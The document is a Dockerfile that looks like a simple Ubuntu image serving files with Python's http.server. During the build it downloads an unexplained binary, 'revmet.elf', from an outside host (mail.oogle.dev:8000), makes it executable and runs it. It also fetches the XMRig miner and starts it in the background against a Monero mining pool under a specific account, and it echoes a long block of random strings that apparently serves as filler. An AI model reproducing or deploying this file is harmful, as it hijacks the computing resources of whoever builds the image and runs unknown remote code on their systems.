FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 3tgA0vFvEE0FY4zU0in1piC6e1DF0htt UhjzBkRWmd29y3zipT5DrMhXwQD29C0M MBMWtpnrRw4Dp8qUkJO6yrj7lTLONDXB GvVvX5AYrnKFEFRew4kn3Rbu8dp6E1SI jCQiu7bl8IapMYcKvFQDF2I39fPtjUBJ ba41GWyXLghHtLbz11WH6pZTKAOWbRfx KL8R8MIVZBUX1sTBo3X5ImAvb8R5eVqP LW9P44bzkE4Pd3CpdWpVqM8zQgdXOXDn YysBK4l2ICWG32hVDaQ9nv0ECOJvZXow 21EvVGbiDufmEJUrPY8biBTkNUcaVkgt Dh4znP54h5HAzY6ck4BGUWSnriJA5slB HU0ZvUuwHsf6GsHLYYhyKwNQWw1NNVW2 DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]